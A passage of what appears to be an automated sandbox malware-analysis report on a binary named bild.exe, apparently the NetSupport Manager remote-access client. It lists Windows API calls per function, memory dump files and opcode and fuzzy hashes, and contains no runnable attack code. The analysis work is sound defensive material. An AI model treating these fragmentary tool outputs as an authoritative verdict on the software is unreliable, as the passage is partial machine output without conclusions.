                                                                                      • CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                      • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                      • API String ID: 3222248624-258972079
                                                                                      • Opcode ID: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                      • Instruction ID: ffe5b7852bae71a5603cb4f529131e3535c43cf5cc9a129c5e7f13935f1cb029
                                                                                      • Opcode Fuzzy Hash: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                      • Instruction Fuzzy Hash: 9C11AC74E0012DABC700EAE5DC95AEFBB68AF45709F100029F50AEB144EA21EA40C7E2
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11025D16
                                                                                      • K32GetProcessImageFileNameA.KERNEL32(?,?,?,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D32
                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025D46
                                                                                      • SetLastError.KERNEL32(00000078,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D69
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: AddressProc$ErrorFileImageLastNameProcess
• String ID: GetModuleFileNameExA$GetProcessImageFileNameA
• API String ID: 4186647306-532032230
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
• CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
• WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
• CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Create$CloseEventHandleObjectSingleThreadWait
• String ID: ..\ctl32\Refcount.cpp$hThread
• API String ID: 3360349984-1136101629
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: wsprintf
• String ID: %s%s%s.bin$051829$_HF$_HW$_SW
• API String ID: 2111968516-2890156708
APIs
• GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11102B03
• GetStockObject.GDI32(00000004), ref: 11102B5B
• RegisterClassA.USER32(?), ref: 11102B6F
• CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 11102BAC
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: AtomClassCreateGlobalObjectRegisterStockWindow
• String ID: NSMDesktopWnd
• API String ID: 2669163067-206650970
APIs
• KillTimer.USER32(00000000,00000000,TermUI...), ref: 1113CC9A
• KillTimer.USER32(00000000,00007F5A,TermUI...), ref: 1113CCB3
• FreeLibrary.KERNEL32(75B40000,?,TermUI...), ref: 1113CD2B
• FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 1113CD43
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: FreeKillLibraryTimer
• String ID: TermUI
• API String ID: 2006562601-4085834059
APIs
• RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
• RegCloseKey.ADVAPI32(?), ref: 11145404
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CloseOpen
• String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
• API String ID: 47109696-3245241687
APIs
  • Part of subcall function 11111430: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
  • Part of subcall function 11111430: __wsplitpath.LIBCMT ref: 11111475
  • Part of subcall function 11111430: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
• GetComputerNameA.KERNEL32(?,?), ref: 11111578
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
• String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
• API String ID: 806825551-1858614750
                                                                                      • Opcode ID: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                      • Instruction ID: bd5304e3d9974d7ab46afc427c644d654ac0d4b62daaa3d8a48381b774377c4d
                                                                                      • Opcode Fuzzy Hash: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                      • Instruction Fuzzy Hash: 4B214676A142491BD701CF309D80BBFFFBA9F8B249F080578D852DB145E626D914C391
APIs
  • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
  • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\bild.exe,00000104,?,11143E73,?), ref: 11143C49
• WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144255
• ResetEvent.KERNEL32(00000260), ref: 11144269
• SetEvent.KERNEL32(00000260), ref: 1114427F
• WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1114428E
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
• String ID: MiniDump
• API String ID: 1494854734-2840755058
• Opcode ID: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
• Instruction ID: 829689d5ebdc208bf7b78735a50f5ce9a06f611da5f38dced1c13c8e9b13f18e
• Opcode Fuzzy Hash: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
• Instruction Fuzzy Hash: 4F113875E5422677E300DFF99C81F9AF768AB44B28F200230EA24D75C4EB71A504C7B1
APIs
  • Part of subcall function 6C5D5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C5D5014
  • Part of subcall function 6C5D5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C5D8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C5D5034
• CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6C5D8EAE
• FreeLibrary.KERNEL32(?), ref: 6C5D8EBF
  • Part of subcall function 6C5D2420: _strrchr.LIBCMT ref: 6C5D242E
Strings
Memory Dump Source
• Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
• Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
Yara matches
Similarity
• API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
• String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
• API String ID: 3215810784-3459472706
• Opcode ID: 3ee5d9b70c8375cfaad0b33beadb582dc74712d6f31e78f945432fbef0c93e6f
• Instruction ID: 4573ae2351151d015c2c357bba2021c5f544f90380badc6162b9e0d8fb36d264
• Opcode Fuzzy Hash: 3ee5d9b70c8375cfaad0b33beadb582dc74712d6f31e78f945432fbef0c93e6f
• Instruction Fuzzy Hash: 6111E471A04316DFDF109B599C41BEA7374EB45306F010466DE19E7A40EB70BE48CFAA
APIs
• LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 11146DCF
• wsprintfA.USER32 ref: 11146E06
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: wsprintf$ErrorExitLastLoadMessageProcessString
• String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
• API String ID: 1985783259-2296142801
• Opcode ID: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
• Instruction ID: b1a6c5171231f01418375ac6f2de6c12625a8d09d3611db16d7d0d369645f93a
• Opcode Fuzzy Hash: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
• Instruction Fuzzy Hash: FA11A5FAE00128ABC720DB65ED81FAAF77C9B4461DF000565EB19B6141EA35AA05C7A8
APIs
• _malloc.LIBCMT ref: 1110F439
  • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
  • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
  • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
• wsprintfA.USER32 ref: 1110F454
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
• _memset.LIBCMT ref: 1110F477
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
• String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
• API String ID: 3234921582-2664294811
• Opcode ID: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
• Instruction ID: e8e28b36a5a63397ef775e95fa380a20e388029766e4784519104262db02a7f0
• Opcode Fuzzy Hash: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
• Instruction Fuzzy Hash: 1CF0F6B5E0012863C720AFA5AC06FEFF37C9F91658F440169EE04A7241EA71BA11C7E9
APIs
  • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
  • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
  • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
  • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
• LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
• GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
• FreeLibrary.KERNEL32(00000000,?,11030690,00000002), ref: 11145B24
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
• String ID: SetProcessDpiAwareness$shcore.dll
• API String ID: 1108920153-1959555903
• Opcode ID: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
• Instruction ID: 699a5c6b52ff0bb6954823876d42b720b76b3255f49526743c1f98bd9e848574
• Opcode Fuzzy Hash: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
• Instruction Fuzzy Hash: 67F0A03A70022877E21416BAAC08F9ABB5A8BC8A75F140230F928D69C0EB51C90086B5
APIs
• wsprintfA.USER32 ref: 11031926
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: wsprintf$ErrorExitLastMessageProcess
• String ID: %s%s.bin$051829$clientinv.cpp$m_pDoInv == NULL
• API String ID: 4180936305-3347479217
• Opcode ID: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
• Instruction ID: 64da4217f7417b153db366359b1c36bd372b32cb55e7c28d29c46c6ec3487e21
• Opcode Fuzzy Hash: 84e0b1850b63e3f6f9fe70c2d5af7440bbdd732114a0c990adb36dbba2c833c3
• Instruction Fuzzy Hash: 5421A1B9E04709AFD710CF65DC81BAAB7F4FB88718F40453EE86597680EB35A9008B65
APIs
• GetFileAttributesA.KERNEL32(11144D48,00000000,?,11144D48,00000000), ref: 1114468C
• __strdup.LIBCMT ref: 111446A7
  • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
  • Part of subcall function 11144670: _free.LIBCMT ref: 111446CE
• _free.LIBCMT ref: 111446DC
  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
• CreateDirectoryA.KERNEL32(11144D48,00000000,?,?,?,11144D48,00000000), ref: 111446E7
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
• String ID:
• API String ID: 398584587-0
• Opcode ID: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
• Instruction ID: 9245e394badc27c9d68c775c1ae1103ae8f1f8453310ecf51c29309078bed6c3
• Opcode Fuzzy Hash: 1d6e66add7aa45a35b25948c47e98be79544d5c3af84ae5a96c3b7650b6c772d
• Instruction Fuzzy Hash: F4016D7A7441065BF301197D7C057ABBB8C8F82AADF144032F89DC3D80F752E41682A1
APIs
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EDA2
  • Part of subcall function 11160824: _setlocale.LIBCMT ref: 11160836
• _free.LIBCMT ref: 1100EDB4
  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
• _free.LIBCMT ref: 1100EDC7
• _free.LIBCMT ref: 1100EDDA
• _free.LIBCMT ref: 1100EDED
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
• String ID:
• API String ID: 3515823920-0
• Opcode ID: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
• Instruction ID: 71b49ece8787e94f553dd036e4ff5c8d0ec16ff98238e97fea1187b5179b4c62
• Opcode Fuzzy Hash: e9cccfb890659d646b87ebb6d02808fc30e7ad32e75d4fdbd2f602c0bae7d034
• Instruction Fuzzy Hash: E61190B1D046109BD620DF599C40A5BF7FCEB44754F144A2AE456D3780E672F900CB91
APIs
  • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
• wsprintfA.USER32 ref: 1114593E
• wsprintfA.USER32 ref: 11145954
  • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
  • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
  • Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
• String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
• API String ID: 3779116287-2600120591
• Opcode ID: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
• Instruction ID: 1f9a4f0ce9ce2038842d239495dc50e58c380b2d1dc072d0c6c391bd72002940
• Opcode Fuzzy Hash: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
• Instruction Fuzzy Hash: 9C01B1B990521D66CB109BB0AC41FEAF77C9B1470DF100199EC1996940EE21BA548BA4
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,75BF8400,?), ref: 111432C7
• CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
• CloseHandle.KERNEL32(00000000), ref: 111432EF
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CreateFile$CloseHandle
• String ID: "
• API String ID: 1443461169-123907689
• Opcode ID: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
• Instruction ID: 150de81b6b92e27c68bcdd2e608667d56283c35638c5ea37a79585d4ca6bceb2
• Opcode Fuzzy Hash: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
• Instruction Fuzzy Hash: 38217C30A1C269AFE3128E78DD54FD9BBA49F45B14F3041E0E4999B1C1DBB1A948C750
APIs
  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
• SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,A1BC2D8B,74DF2EE0,?,00000000,1118083B,000000FF,?,110300D6,UseIPC,00000001,00000000), ref: 1102D187
  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
  • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D14A
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
• String ID: Client$DisableGeolocation
• API String ID: 3315423714-4166767992
• Opcode ID: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
• Instruction ID: 1755caac6fc2658334c1ed2ebc8622a08952aff54e10c128aab6c20125b970ec
• Opcode Fuzzy Hash: a2dd62344aa7ed2eba45e03fd0b01f9a1bb13e0d2f8602a6c4817aeae004d655
• Instruction Fuzzy Hash: 8521E474A40315BBE712CFA8CD42B6EF7A4E708B18F500269F921AB3C0D7B5B8008785
APIs
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110271DA
  • Part of subcall function 110CD550: EnterCriticalSection.KERNEL32(00000000,00000000,75BF3760,00000000,75C0A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
  • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
  • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
  • Part of subcall function 110CD550: LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4
• TranslateMessage.USER32(?), ref: 110271F0
• DispatchMessageA.USER32(?), ref: 110271F6
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                      • String ID: Exit Msgloop, quit=%d
                                                                                      • API String ID: 3212272093-2210386016
                                                                                      • Opcode ID: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                      • Instruction ID: 083e85bce0718499e1b375aadfda5de5654481b636091be3423b85693ac47093
                                                                                      • Opcode Fuzzy Hash: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                      • Instruction Fuzzy Hash: 3D01D876E0521D66EB15DAE99C82F6FF3BD6B64718FD00065EE1092185F760F404CBA1
APIs
• GetTickCount.KERNEL32 ref: 110173FD
  • Part of subcall function 11017300: WaitForSingleObject.KERNEL32(00000300,000000FF), ref: 1101733C
  • Part of subcall function 11017300: CoInitialize.OLE32(00000000), ref: 11017345
  • Part of subcall function 11017300: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
  • Part of subcall function 11017300: CoUninitialize.COMBASE ref: 110173D0
  • Part of subcall function 11017220: WaitForSingleObject.KERNEL32(00000300,000000FF), ref: 11017252
  • Part of subcall function 11017220: CoInitialize.OLE32(00000000), ref: 1101725B
  • Part of subcall function 11017220: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
  • Part of subcall function 11017220: CoUninitialize.COMBASE ref: 110172E0
• SetEvent.KERNEL32(00000300), ref: 1101741D
• GetTickCount.KERNEL32 ref: 11017423
Strings
